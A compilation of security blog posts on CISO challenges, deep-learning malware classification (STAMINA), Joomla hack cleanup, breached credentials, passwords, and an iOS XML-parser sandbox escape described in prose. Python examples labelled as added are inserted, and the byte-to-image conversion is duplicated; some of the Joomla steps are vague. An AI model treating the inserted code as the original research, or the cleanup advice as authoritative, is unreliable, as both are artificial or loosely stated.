Ask five different CEOs what their CISOs do and after the high level “manage security” answer you’ll probably get five very different explanations. This is partly because CISO responsibility can vary widely from company to company. So, it’s no surprise that many of the CISOs we interviewed touched on this point.

TM Ching summed it up this way, “Demonstrating my role to the organization can be a challenge—a role like mine may be perceived as symbolic” or that security is just here to “slow things down.” For Jason, “making sure that business leaders understand the difference between IT Operations, Cybersecurity, and InfoSec” can be difficult because execs “often think all of those disciplines are the same thing” and that since IT Ops has the products and solutions, they own security. Jim also bumped up against confusion about the security role with multiple stakeholders pushing and pulling in different directions like “a CIO who says ‘here is your budget,’ a CFO who says ‘why are you so expensive?’ and a general counsel who says ‘we could be leaking information everywhere.'”

What works:

  • Educate Execs—about the role of a CISO. Helping them “understand that it takes a program, that it’s a discipline.” One inflection point is after a breach, “you may be sitting there with an executive, the insurance company, their attorneys, maybe a forensics company and it always looks the same. The executive is looking down the table at the wide-eyed IT person saying ‘What happened?’” It’s an opportunity to educate, to help “make sure the execs understand the purpose of risk management.”—Jason Golden. To see how to do this watch Microsoft CISO Series Episode 2 Part 1: Security is everyone’s Business
  • Show Don’t Tell—“It is important to constantly demonstrate that I am here to help them succeed, and not to impose onerous compliance requirements that stall their projects.”—TM Ching
  • Accountability Awareness—CISOs do a lot, but one thing they shouldn’t do is to make risk decisions for the business in a vacuum. That’s why it’s critical to align “all stakeholders (IT, privacy, legal, financial, security, etc.) around the fact that cybersecurity and compliance are business risk issues and not IT issues. IT motions are (and should be) purely in response to the business’ decision around risk tolerance.”—Jim Eckart

Exerting influence

Fans of Boehm’s curve know that the earlier security can be introduced into a process, the less expensive it is to fix defects and flaws. But it’s not always easy for CISOs to get security a seat at the table whether it’s early in the ideation process for a new customer facing application or during financial negotiations to move critical workloads to the cloud. As TM put it, “Exerting influence to ensure that projects are secured at Day 0. This is possibly the hardest thing to do.” And because “some business owners do not take negative news very well” telling them their new app baby is “security ugly” the day before launch can be a gruesome task. And as Jason pointed out, “it’s one thing to talk hypothetically about things like configuration management and change management and here are the things that you need to do to meet those controls so you can keep your contract. It’s a different thing to get that embedded in operations so that IT and HR all the way through finance are following the rules for change management and configuration management.”

What Works:

  • Negotiate engagement—To avoid the last minute “gotchas” or bolting on security after a project has deployed, get into the conversation as early as possible. This isn’t easy, but as TM explains, it can be done. “It takes a lot of negotiations to convince stakeholders why it will be beneficial for them in the long run to take a pause and put the security controls in place, before continuing with their projects.”
  • Follow frameworks—Well-known frameworks like the NIST Cybersecurity Framework, NIST SP800-53, and SP800-37 can help CISOs “take things from strategy to operations” by providing baselines and best practices for building security into the entire organization and systems lifecycle. And that will pay off in the long run; “when the auditors come calling, they’re looking for evidence that you’re following your security model and embedding that throughout the organization.” —Jason

Cultivating culture

Wouldn’t it be wonderful if every company had a security mindset and understood the benefits of having a mature, well-funded security and risk management program? If every employee understood what a phish looks like and why they should report it? Unfortunately, most companies aren’t laser focused on security, leaving that education work up to the CISO and their team. And having those conversations with stakeholders that sometimes have conflicting agendas requires technical depth and robust communication skills. That’s not easy. As Jim points out, “it’s a daunting scope of topics to be proficient in at all levels.”

What works:

  • Human firewalls—All the tech controls in the world won’t stop 100 percent of attacks, people need to be part of the solution too. “We can address administrative controls, technical controls, physical controls, but you also need to address the culture and human behavior, or the human firewalls. You know you’re only going to be marginally successful if you don’t engage employees too.” —Jason
  • Know your audience—CISOs need to cultivate “depth and breadth. On any given day, I needed to move from board-level conversations (where participants barely understand security) all the way to the depths of zero day vulnerabilities, patching, security architecture.” —Jim

Did you find these insights helpful? What would you tell your fellow CISOs about overcoming obstacles? What works for you? Please reach out to me on LinkedIn and let me know what you thought of this article and if you’re interested in being interviewed for one of our upcoming posts.

The post CISO stress-busters: post #1 overcoming obstacles appeared first on Microsoft Security.

Microsoft researchers work with Intel Labs to explore new deep learning approaches for malware classification

The opportunities for innovative approaches to threat detection through deep learning, a category of algorithms within the larger framework of machine learning, are vast. Microsoft Threat Protection today uses multiple deep learning-based classifiers that detect advanced threats, for example, evasive malicious PowerShell.

In continued exploration of novel detection techniques, researchers from Microsoft Threat Protection Intelligence Team and Intel Labs are collaborating to study new applications of deep learning for malware classification, specifically:

  • Leveraging deep transfer learning techniques from computer vision for static malware classification
  • Optimizing deep learning techniques in terms of model size and leveraging platform hardware capabilities to improve execution of deep-learning malware detection approaches

For the first part of the collaboration, the researchers built on Intel’s prior work on deep transfer learning for static malware classification and used a real-world dataset from Microsoft to ascertain the practical value of approaching the malware classification problem as a computer vision task. The basis for this study is the observation that if malware binaries are plotted as grayscale images, the textural and structural patterns can be used to effectively classify binaries as either benign or malicious, as well as cluster malicious binaries into respective threat families.

The researchers used an approach that they called static malware-as-image network analysis (STAMINA). Using the dataset from Microsoft, the study showed that the STAMINA approach achieves high accuracy in detecting malware with low false positives.

The results and further technical details of the research are listed in the paper STAMINA: Scalable deep learning approach for malware classification and set the stage for further collaborative exploration.

The role of static analysis in deep learning-based malware classification

While static analysis is typically associated with traditional detection methods, it remains an important building block for AI-driven malware detection. It is especially useful for pre-execution detection engines: static analysis disassembles code without having to run applications or monitor runtime behavior.

Static analysis produces metadata about a file. Machine learning classifiers on the client and in the cloud then analyze the metadata and determine whether a file is malicious. Through static analysis, most threats are caught before they can even run.

For more complex threats, dynamic analysis and behavior analysis build on static analysis to provide more features and build more comprehensive detection. Finding ways to perform static analysis at scale and with high effectiveness benefits overall malware detection methodologies.

To this end, the research borrowed knowledge from the computer vision domain to build an enhanced static malware detection framework that leverages deep transfer learning to train directly on portable executable (PE) binaries represented as images.

Analyzing malware represented as image

To establish the practicality of the STAMINA approach, which posits that malware can be classified at scale by performing static analysis on malware code represented as images, the study covered three main steps: image conversion, transfer learning, and evaluation.

Diagram showing the steps for the STAMINA approach: pre-processing, transfer learning, and evaluation

First, the researchers prepared the binaries by converting them into two-dimensional images. This step involved pixel conversion, reshaping, and resizing. The binaries were converted into a one-dimensional pixel stream by assigning each byte a value between 0 and 255, corresponding to pixel intensity. Each pixel stream was then transformed into a two-dimensional image by using the file size to determine the width and height of the image.
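
The pre-processing step described above, as an added example in pure Python (no NumPy or PIL) that is not the Microsoft/Intel research code: every byte becomes one grayscale pixel, the pixel stream is cut into rows whose width is chosen from the file size, and the resulting image is resized with nearest-neighbour sampling to a fixed input size. The width schedule is the one commonly used in malware-as-image work (Nataraj et al., 2011); the page does not reproduce the paper’s exact table, so treat the schedule as an assumption. The input is a constructed stand-in for a PE file, not a real binary.

```python
"""Binary -> 2-D grayscale image, as in STAMINA's pre-processing step.
Added example; the width schedule is an assumption and the input is constructed."""
import random

# Width chosen from file size (Nataraj et al., 2011 schedule; assumed here).
WIDTH_SCHEDULE = [
    (10 * 1024, 32),
    (30 * 1024, 64),
    (60 * 1024, 128),
    (100 * 1024, 256),
    (200 * 1024, 384),
    (500 * 1024, 512),
    (1000 * 1024, 768),
]
DEFAULT_WIDTH = 1024   # files of 1 MB and above


def image_width(size):
    """Row width for a file of `size` bytes."""
    for limit, width in WIDTH_SCHEDULE:
        if size < limit:
            return width
    return DEFAULT_WIDTH


def bytes_to_image(data):
    """Return a list of rows, each a list of ints 0..255 (byte value = pixel
    intensity). The final row is zero-padded so every row has the same width."""
    width = image_width(len(data))
    pixels = list(data)
    pixels.extend([0] * ((-len(pixels)) % width))
    return [pixels[i:i + width] for i in range(0, len(pixels), width)]


def resize_nearest(image, out_h, out_w):
    """Nearest-neighbour resize to out_h x out_w, the fixed size a CNN front end
    expects. A real pipeline uses a library resampler; this keeps the example
    dependency-free."""
    in_h, in_w = len(image), len(image[0])
    return [
        [image[min(in_h - 1, y * in_h // out_h)][min(in_w - 1, x * in_w // out_w)]
         for x in range(out_w)]
        for y in range(out_h)
    ]


def build_sample():
    """Constructed stand-in for a PE file: an 'MZ' header, a run of NOP bytes,
    a high-entropy (packed-looking) block and a zero-filled tail, so each
    region has a visibly different texture in the image."""
    rng = random.Random(1)
    header = b"MZ" + bytes(62)
    code = bytes([0x90]) * 2000
    packed = bytes(rng.randrange(256) for _ in range(3000))
    tail = bytes(1500)
    return header + code + packed + tail


if __name__ == "__main__":
    blob = build_sample()
    img = bytes_to_image(blob)
    small = resize_nearest(img, 64, 64)
    print(f"{len(blob)} bytes -> {len(img)}x{len(img[0])} -> {len(small)}x{len(small[0])}")
```

The 6,564-byte sample falls in the smallest size band, so it becomes a 32-pixel-wide image of 206 rows; the NOP run shows as a flat band, the random block as noise and the tail as black, which is the kind of texture the classifier keys on.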

The second step was to use transfer learning, a technique for overcoming the isolated learning paradigm and utilizing knowledge acquired for one task to solve related ones. Transfer learning has enjoyed tremendous success within several different computer vision applications. It accelerates training time by bypassing the need to search for optimized hyperparameters and different architectures—all this while maintaining high classification performance. For this study, the researchers used Inception-v1 as the base model.

The study was performed on a dataset of 2.2 million PE file hashes provided by Microsoft. This dataset was temporally split into 60:20:20 segments for training, validation, and test sets, respectively.
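As an added illustration (not code from the Microsoft/Intel research), here are the byte-to-pixel conversion and the temporal split described above in Python. The width-by-file-size table, the nearest-neighbour resize and the sample records are assumptions chosen for this example; the page does not give the research's own values.

```python
import math
from typing import Dict, List, Tuple

# Image width chosen from file size. These buckets are a constructed assumption for
# illustration; the research's own size-to-width mapping is not given on the page.
WIDTH_BUCKETS: List[Tuple[int, int]] = [
    (10 * 1024, 32), (30 * 1024, 64), (60 * 1024, 128), (100 * 1024, 256),
    (200 * 1024, 384), (500 * 1024, 512), (1000 * 1024, 768),
]
DEFAULT_WIDTH = 1024


def image_width_for_size(size: int) -> int:
    """Pick a row width so that larger files produce wider (not only taller) images."""
    for limit, width in WIDTH_BUCKETS:
        if size < limit:
            return width
    return DEFAULT_WIDTH


def bytes_to_image(data: bytes) -> List[List[int]]:
    """Step 1: every byte becomes one grayscale pixel (0-255) in a 1-D stream, which is
    then cut into rows of `width` pixels. The last row is zero-padded to keep the
    image rectangular."""
    if not data:
        return []
    width = image_width_for_size(len(data))
    height = math.ceil(len(data) / width)
    padded = data + bytes(width * height - len(data))
    return [list(padded[row * width:(row + 1) * width]) for row in range(height)]


def resize_nearest(img: List[List[int]], out_w: int, out_h: int) -> List[List[int]]:
    """Nearest-neighbour resize to the fixed input size a CNN expects. Assumption: the
    page only says the images were resized, not which interpolation was used."""
    in_h = len(img)
    in_w = len(img[0]) if in_h else 0
    if in_h == 0 or in_w == 0:
        return [[0] * out_w for _ in range(out_h)]
    return [[img[y * in_h // out_h][x * in_w // out_w] for x in range(out_w)]
            for y in range(out_h)]


def temporal_split(samples: List[Dict], fractions=(0.6, 0.2, 0.2)):
    """Sort by first-seen time and cut 60:20:20, so validation and test samples are
    strictly newer than anything trained on (a random split would leak future
    samples into training and inflate the measured recall)."""
    ordered = sorted(samples, key=lambda s: s["first_seen"])
    n_train = int(len(ordered) * fractions[0])
    n_val = int(len(ordered) * fractions[1])
    return ordered[:n_train], ordered[n_train:n_train + n_val], ordered[n_train + n_val:]


def demo_samples(count: int = 10) -> List[Dict]:
    """Constructed records standing in for the hash-indexed dataset; not real file hashes."""
    return [{"sha256": f"constructed-hash-{i:02d}",
             "first_seen": f"2019-{1 + i % 12:02d}-15",
             "label": i % 3 == 0} for i in range(count)]
```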

Diagram showing a DNN with pre-trained weights on natural images, and the last portion fine-tuned with new data

Finally, the performance of the system was measured and reported on the holdout test set. The metrics captured include recall at specific false positive rates, along with accuracy, F1 score, and area under the receiver operating characteristic (ROC) curve.

Findings

The joint research showed that applying STAMINA to the real-world hold-out test set achieved a recall of 87.05% at a 0.1% false positive rate, and 99.66% recall and 99.07% accuracy at a 2.58% false positive rate overall. The results certainly encourage the use of deep transfer learning for malware classification. It accelerates training by bypassing the search for optimal hyperparameters and architectures, saving time and compute resources in the process.
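The "recall at a fixed false positive rate" figures above are threshold-dependent, and it is easy to compute them wrongly when scores tie. This added example (mine, not the research's evaluation code) derives the best recall reachable under an FPR budget and the accuracy/F1 at the chosen threshold from constructed classifier scores.

```python
from typing import List, Optional, Tuple


def recall_at_fpr(scores: List[float], labels: List[bool],
                  max_fpr: float) -> Tuple[float, Optional[float]]:
    """Highest recall reachable without the false positive rate exceeding `max_fpr`,
    plus the score threshold (predict malicious when score >= threshold) achieving it.
    Samples are walked from the highest score down; tied scores are consumed together
    because a single threshold cannot separate them."""
    positives = sum(1 for y in labels if y)
    negatives = len(labels) - positives
    order = sorted(range(len(scores)), key=lambda i: -scores[i])
    tp = fp = 0
    best: Tuple[float, Optional[float]] = (0.0, None)
    i = 0
    while i < len(order):
        threshold = scores[order[i]]
        while i < len(order) and scores[order[i]] == threshold:
            if labels[order[i]]:
                tp += 1
            else:
                fp += 1
            i += 1
        fpr = fp / negatives if negatives else 0.0
        if fpr > max_fpr:
            break  # FPR only grows as the threshold drops, so nothing lower can qualify
        best = (tp / positives if positives else 0.0, threshold)
    return best


def metrics_at_threshold(scores: List[float], labels: List[bool], threshold: float) -> dict:
    """Accuracy, precision, recall, F1 and FPR for one fixed decision threshold."""
    tp = sum(1 for s, y in zip(scores, labels) if y and s >= threshold)
    fp = sum(1 for s, y in zip(scores, labels) if not y and s >= threshold)
    fn = sum(1 for s, y in zip(scores, labels) if y and s < threshold)
    tn = len(scores) - tp - fp - fn
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return {"accuracy": (tp + tn) / len(scores), "precision": precision,
            "recall": recall, "f1": f1, "fpr": fp / (fp + tn) if fp + tn else 0.0}


def demo_scores() -> Tuple[List[float], List[bool]]:
    """Constructed classifier outputs: 5 malicious (True) then 10 benign (False) samples."""
    scores = [0.95, 0.90, 0.80, 0.70, 0.31,
              0.85, 0.45, 0.40, 0.35, 0.30, 0.25, 0.20, 0.15, 0.10, 0.05]
    labels = [True] * 5 + [False] * 10
    return scores, labels
```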

The study also highlights the pros and cons of sample-based methods like STAMINA and metadata-based classification methods. For example, STAMINA can go in-depth into samples and extract additional signals that might not be captured in the metadata. However, for larger applications STAMINA becomes less effective because of limitations in converting billions of pixels into JPEG images and then resizing them. In such cases, metadata-based methods have the advantage over our approach.

Conclusion and future work

The use of deep learning methods for detecting threats drives a lot of innovation across Microsoft. The collaboration with Intel Labs researchers is just one of the ways in which Microsoft researchers and data scientists continue to explore novel ways to improve security overall.

This joint research is a good starting ground for more collaborative work. For example, the researchers plan to collaborate further on platform acceleration optimizations that can allow deep learning models to be deployed on client machines with minimal performance impact. Stay tuned.


Jugal Parikh, Marc Marino

Microsoft Threat Protection Intelligence Team


The post Microsoft researchers work with Intel Labs to explore new deep learning approaches for malware classification appeared first on Microsoft Security.

Learn Five Easy Steps To Fix Joomla Hack

When we talk about the second most popular Content Management System (CMS), Joomla is there. It lets users publish websites conveniently and is user-friendly. Although Joomla is one of the most widely used systems for building sites, it can still be hacked. If you do not keep its plugins updated, you may soon face such a problem. Therefore you must learn several things about how to fix a Joomla hack.

Remember that each new update comes with more advanced security tools, which are useful in preventing hacks. So if you keep using the old version, there is a chance that a black hat hacker will gain access to your website. Hackers are like mosquitoes: they keep adapting their skills to get into the system, and only the new security tools that come with updates can keep them away!

But if your website does get hacked, here are some vital steps you can follow to get out of this problem. Here you can learn how to fix a Joomla hack.

What Are Signs That A Website Has Been Hacked?

Before you fix a Joomla hack, you must first determine whether your site has actually been hacked. Then you can proceed with the solutions.

  •       Your website redirects to spam
  •       Your admin account keeps logging you out
  •       Pages have become bulky and load slowly
  •       Google has checked the website for ‘malware’ or ‘phishing’ and blacklisted it
  •       Undesirable and malicious ads are popping up along with spam

Jump Into The Fix Joomla Hack And Malware Removal Process  

If you come across some common indicators like abnormal browser behavior, modified files, and blacklist warnings by Google and other search engines, then you need to get it fixed soon. Below is the process that can help you in such a situation!

Fix Joomla hack

The very first step is to clean the full website once you have located the potential malware. It is also vital to determine whether any files have changed. To do this, compare the infected files with the previous versions saved in your backup. This will help you identify and remove the malicious files.

Using a database admin tool like phpMyAdmin or Adminer, clean the hacked Joomla database. Next, secure all your accounts, because many smart hackers intentionally leave backdoors to regain access to your website. That is why you should carefully cleanse any infected files that could serve as a backdoor.

  1. Database Cleanup

A Joomla SQL injection can create new database users, so the first task is to start cleaning the infected files. Once you detect the rogue users, delete them immediately using the SQL statement DROP USER. You should also sanitize user input and restrict the database permissions of the account.

  2. Safeguarding the Server

A faulty server can always cause damage, even if the installation itself is secure. There are many vital points to remember regarding Joomla security, but here are some of the most important:

  •       Remove unused subdomains
  •       Routinely check for configuration issues
  •       Close any open ports
  •       Block error messages that can leak information

  3. Setting Authorizations

First, make sure that no one can upload executables such as .php or .aspx files; allow only image uploads to the server. After this, you can move on to setting the permissions on the server.

Here, make sure you are using well-known extensions. You do not have to worry about finding them, because Joomla is a pretty big CMS and extensions are easy to get. This is one of the vital steps to fix a Joomla hack, because well-known extensions get updated quickly.

  4. Check Changed Files in Joomla

Usually, hackers make changes to your original files and add malicious files to them. They inject infected files that give them more access over the website, which can cause problems for you during reinstallation. In such cases, you need to do a fresh installation, and for that you must have a backup.

You can use various handy commands to check the modifications made to your files, which helps you fix a Joomla hack.

  5. Check The User Logs

The best way to figure out the root cause of a Joomla hack is through the system logs. These record all the activities that took place earlier. Whenever a SQL injection or XSS attack takes place, there is always a recorded request. Not just this: hackers also try to create new admin accounts. You can follow these steps to check for any suspicious users:

  •       Start by logging in to your Joomla dashboard.
  •       Next, click Users and pick Manage.
  •       Here you can check for suspicious users who recently registered.
  •       Remove any unknown users.
  •       Check each user's last visit date.
  •       Find the location where the server logs are stored.
  •       Remove any unknown IPs, if any.
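The "Setting Authorizations" and "Check Changed Files" steps above can be automated instead of eyeballing directories. This is an added Python example (not from the post or from Joomla): it hashes a known-good backup and the live site tree, reports modified, added and missing files, and flags executable files under the upload directory. The `images` upload directory and the demo file contents are assumptions constructed for the example.

```python
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List

# Extensions that should never appear under the media upload directory (Joomla's "images/").
EXECUTABLE_SUFFIXES = {".php", ".phtml", ".php5", ".phar", ".aspx"}


def hash_tree(root: Path) -> Dict[str, str]:
    """Map every file under root (path relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def compare_trees(backup: Path, live: Path) -> Dict[str, List[str]]:
    """Files whose content changed, files only in the live tree (dropped files), and
    files that vanished, all relative to the known-good backup."""
    before, after = hash_tree(backup), hash_tree(live)
    return {
        "modified": sorted(p for p in before if p in after and before[p] != after[p]),
        "added": sorted(p for p in after if p not in before),
        "missing": sorted(p for p in before if p not in after),
    }


def executables_in_uploads(live: Path, uploads_dir: str = "images") -> List[str]:
    """Anything executable under the upload directory violates the 'images only' rule."""
    root = live / uploads_dir
    if not root.is_dir():
        return []
    return sorted(p.relative_to(live).as_posix() for p in root.rglob("*")
                  if p.is_file() and p.suffix.lower() in EXECUTABLE_SUFFIXES)


def _write(root: Path, rel: str, content: str) -> None:
    path = root / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(content)


def demo() -> Dict[str, object]:
    """Builds a constructed backup/live pair in a temp directory and runs both checks."""
    base = Path(tempfile.mkdtemp(prefix="joomla-demo-"))
    backup, live = base / "backup", base / "live"
    for root in (backup, live):
        _write(root, "index.php", "<?php // constructed: unchanged entry point\n")
        _write(root, "configuration.php", "<?php // constructed: unchanged config\n")
    _write(backup, "components/com_content/controller.php", "<?php // constructed: original\n")
    _write(live, "components/com_content/controller.php", "<?php // constructed: modified\n")
    _write(backup, "htaccess.txt", "# constructed: present only in the backup\n")
    _write(live, "images/upload.php", "<?php // constructed: executable in upload dir\n")
    _write(live, "images/logo.png", "constructed image bytes")
    return {"diff": compare_trees(backup, live), "bad_uploads": executables_in_uploads(live)}
```

Run `compare_trees(Path("/path/to/backup"), Path("/path/to/live"))` against a real site; every "added" `.php` file and every "modified" core file is a candidate for the cleanup and backup-restore steps above.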

Conclusion

So these were the vital steps to fix a Joomla hack. Also, remember the ways to determine whether your website is hacked or not!

The post Learn Five Easy Steps To Fix Joomla Hack appeared first on .

68% of Pharma Executives Have Had Credentials Breached Online

The online credentials for 68% of pharmaceutical executives analyzed for a study have been compromised recently.

The study, conducted by cybersecurity firm Blackcloak, found that the email accounts of over two-thirds of pharmaceutical executives had been compromised within the last five to ten years. Of the compromised emails, 57% were found on the dark web and had been either cracked or stored in plaintext format.

While the primary source (85%) of the email account information was a 2015 data breach of the professional social network LinkedIn, Blackcloak CEO Dr. Chris Pierson assigns much of the blame to weaker cybersecurity via personal devices and accounts belonging to executives, referring to it as “the path of least resistance” for hackers.

“Hackers and cybercriminals spot the opportunity to effortlessly gain access and control over the executives’ home network, enabling them to migrate into the company network from that point. Every day the executive brings their company home, where the security controls are nonexistent and weak ‒ so every night, their corporate networks and company are at risk for a cyberattack,” wrote Pierson.

C-suite executives have been a frequent target for hackers and scammers, but Pierson identified some vulnerabilities specific to the pharmaceutical industry.

“In the pharmaceutical world, executives appeared to move from job to job across a tier of companies and with this they brought their old passwords with them and showed consistent use over a period of sometimes 15 years of same and/or similar passwords,” wrote Pierson.


The post 68% of Pharma Executives Have Had Credentials Breached Online appeared first on Adam Levin.

What Does Your Password Say About Your Preferences?

Passwords say a lot about us. They speak to what we prioritize, what we hold dear. So when I recently saw my wife’s password included the kids’ birthdays and not mine, her priorities were pretty clear. I sure know where I stand!

Whether it’s children’s birth dates or dog names, passwords reveal who we are and what we value, as we all incorporate the relevant aspects of our lives into our passwords to make them easier to remember. While convenient, this habit could actually cause some security mishaps.  

As we honor the first Thursday in May, better known as World Password Day, let’s take a step back to examine some of these common password habits as well as discuss some tips users can follow to secure their online accounts from any potential hackers. 

Common Password Habits

As human beings, we like to keep things simple — which isn’t always a bad thing. However, it’s not ideal when it comes to password security. According to Tech Times, a recent worldwide survey conducted by the United Kingdom’s National Cyber Security Centre on the most common passwords revealed that 23.2 million people still have passwords mentioning the classic ‘123456’ and that ‘123456789’ is used by 7.7 million people worldwide.  

Aside from common character sequences, many people (including my wife) also use significant dates or names of their loved ones as passwords. According to another recent study conducted by The Harris Poll in partnership with Google, nearly 60% of people studied said their birthday has been integrated into at least one password, 33% use a pet’s name, and 22% use their own name. Other common habits also include reusing the same password across multiple accounts, writing them down on a piece of paper, keeping them in a file on their computer, or keeping them in a file on Dropbox or a similar platform.  

These shortcuts are understandable, as it can be challenging to recall so many complex passwords. In fact, a previous McAfee survey stated that 26% of individuals would be willing to give up pampering (manicures, pedicures, massages, etc.) if they never had to remember a password again. Additionally, 34% of respondents are most concerned with the ease of remembering their passwords. 

Potential Security Risks

While convenient, these techniques are not exactly foolproof and can lead to some security concerns. That’s because personalized and simple passwords can put our data a bit more at risk – since hackers can usually find information like birthdays, anniversaries, and pet names online. For instance, that harmless Facebook quiz you were thinking of taking to pass the time can actually reveal your personal information to scammers, allowing them to access your online accounts.  

It’s important users are aware of this risk, especially as we all navigate working from home. As McAfee’s Raj Samani, Chief Scientist and Fellow, would attest, “Password security is essential, especially with the new normal many organizations and people are facing. Staying aware and educated about proper password hygiene is essential for us to keep our data secure as we are connected more than ever these days.” That starts with forming good password habits. Sorry “baxterthedog1234!”

Secure Your Online Accounts

In the post-pandemic world, my family, including my young kids, spends 6+ hours online daily. In the last month, my 6-year-old created 10+ online accounts to do her schoolwork and play. In this new reality, we all have the chance to build better password habits for ourselves and teach them to our kids. That doesn’t mean we have to remember 27 completely unique and complex passwords but can instead just adopt a few easy best practices to help keep our credentials safe. Check out the following tips to help secure your online accounts from criminals.

Use a passphrase

According to ZDNet, the FBI recently found that using a passphrase made up of multiple words in a long string of at least 15 characters is not only more difficult for hackers to crack, but also easier for users to remember. Instead of making a basic password, create a longer passphrase from the lyrics to your favorite song or the ingredients used to make your favorite dish.

Ensure your passwords are unique

Your password or passphrase should be as unique as the information it’s protecting! If a hacker does manage to guess your password for one of your online accounts, it’s likely that they will check for repeat credentials across multiple sites. By using different passwords or passphrases for your online accounts, you can remain calm and collected knowing that the majority of your data is secure if one of your accounts becomes vulnerable.

Use a password manager

Take your security to the next level with a password manager or a comprehensive security solution, like McAfee Total Protection, that comes with one. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated?

Use multi-factor authentication

Two-factor or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification, like texting or emailing a secure code, to verify your identity. Most popular online sites like Gmail, Dropbox, LinkedIn, Facebook, etc. offer multi-factor authentication, and it takes just a few minutes to set up. This reduces the risk of successful impersonation by criminals. Mind you, authentication methods are also evolving due to advanced technology like biometrics. Perhaps the day will be renamed to World No Password Day in the future.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post What Does Your Password Say About Your Preferences? appeared first on McAfee Blogs.

Protect your accounts with smarter ways to sign in on World Passwordless Day

As the world continues to grapple with COVID-19, our lives have become increasingly dependent on digital interactions. Operating at home, we’ve had to rely on e-commerce, telehealth, and e-government to manage the everyday business of life. Our daily online usage has increased by over 20 percent. And if we’re fortunate enough to have a job that we can do from home, we’re accessing corporate apps from outside the company firewall.

Whether we’re signing into social media, mobile banking, or our workplace, we’re connecting via online accounts that require a username and password. The more we do online, the more accounts we have. It becomes a hassle to constantly create new passwords and remember them. So, we take shortcuts. According to a Ponemon Institute study, people reuse an average of five total passwords, both business and personal. This is one aspect of human nature that hackers bet on. If they get hold of one password, they know they can use it to pry open more of our digital lives. A single compromised password, then, can create a chain reaction of liability.

No matter how strong or complex a password is, it’s useless if a bad actor can socially engineer it away from us or find it on the dark web. Plus, passwords are inconvenient and a drain on productivity. People spend hours each year signing into applications and recovering or resetting forgotten usernames and passwords. This activity doesn’t make things more secure. It only drives up the costs of service desks.

People today are done with passwords

Users want something easier and more convenient. Administrators want something more secure. We don’t think anyone finds passwords a cause to celebrate. That’s why we’re helping organizations find smarter ways to sign in that users will love and hackers will hate. Our hope is that instead of World Password Day, we’ll start celebrating World Passwordless Day.

Animated Image: People reuse an average of five passwords across their accounts, both business and personal (Ponemon Institute survey/Yubico). Average person has 90 accounts (Thycotic). Fifty-five percent would prefer a method of protecting accounts that doesn’t involve passwords (Ponemon Institute survey/Yubico). Sixty-seven percent of American consumers surveyed by Visa have used biometric authentication and prefer it to passwords. One-hundred million to 150 million people using a passwordless method each month (Microsoft research, April 2020).

Since an average of one in every 250 corporate accounts is compromised each month, we know that relying on passwords isn’t a good enterprise defense strategy. As companies continue to add more business applications to their portfolios, the cost of passwords only goes up. In fact, companies are dedicating 30 to 60 percent of their support desk calls to password resets. Given how ineffective passwords can be, it’s surprising how many companies haven’t turned on multi-factor authentication (MFA) for their customers or employees.

Passwordless technology is here—and users are adopting it as the best experience for strong authentication. Last November at Microsoft Ignite, we shared that more than 100 million people were already signing in using passwordless methods each month. That number has now reached over 150 million people. According to our recent survey, the use of biometrics for work accounts is set to double this year, with nearly a quarter of companies already using or planning to deploy biometrics soon, signaling an increased desire to ditch the eight-character nuisance.

We now have the momentum to push forward initiatives that increase security and reduce cost. New passwordless technologies give users the benefits of MFA in one gesture. To sign in securely with Windows Hello, all you have to do is show your face or press your finger. Microsoft has built support for passwordless authentication into our products and services, including Office, Azure, Xbox, and GitHub. You don’t even need to create a username anymore—you can use your phone number instead. Administrators can use single sign-on in Azure Active Directory (Azure AD) to enable passwordless authentication for an unlimited number of apps through native functionality in Windows Hello, the phone-as-a-token capabilities in the Microsoft Authenticator app, or security keys built using the FIDO2 open standards.

Of course, we would never advise our customers to try anything we haven’t tried ourselves. We’re always our own first customer. Microsoft’s IT team switched to passwordless authentication and now 90 percent of Microsoft employees sign in without entering a password. As a result, hard and soft costs of supporting passwords fell by 87 percent. We expect other customers will experience similar benefits in employee productivity improvements, lower IT costs, and a stronger security posture. To learn more about our approach, watch the CISO spotlight episode with Bret Arsenault (Microsoft CISO) and myself. By taking this approach 18 months ago, we were better set up for seamless secure remote work during COVID-19.

For many of us, working from home will be a new norm for the foreseeable future. We see many opportunities for using passwordless methods to better secure digital accounts that people rely on every day. Whether you’re protecting an organization or your own digital life, every step towards passwordless is a step towards improving your security posture. Now let’s embrace the world of passwordless!

Related articles

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Protect your accounts with smarter ways to sign in on World Passwordless Day appeared first on Microsoft Security.

iOS XML Bug

This is a good explanation of an iOS bug that allowed someone to break out of the application sandbox. A summary:

What a crazy bug, and Siguza's explanation is very cogent. Basically, it comes down to this:

  • XML is terrible.
  • iOS uses XML for Plists, and Plists are used everywhere in iOS (and MacOS).
  • iOS's sandboxing system depends upon three different XML parsers, which interpret slightly invalid XML input in slightly different ways.

So Siguza's exploit -- which granted an app full access to the entire file system, and more -- uses malformed XML comments constructed in a way that one of iOS's XML parsers sees its declaration of entitlements one way, and another XML parser sees it another way. The XML parser used to check whether an application should be allowed to launch doesn't see the fishy entitlements because it thinks they're inside a comment. The XML parser used to determine whether an already running application has permission to do things that require entitlements sees the fishy entitlements and grants permission.

This is fixed in the new iOS release, 13.5 beta 3.

Comment:

Implementing 4 different parsers is just asking for trouble, and the "fix" is of the crappiest sort, bolting on more crap to check they're doing the right thing in this single case. None of this is encouraging.

More commentary. Hacker News thread.

World Password Day 2020

Are Your Password Habits Keeping You Safe Online?

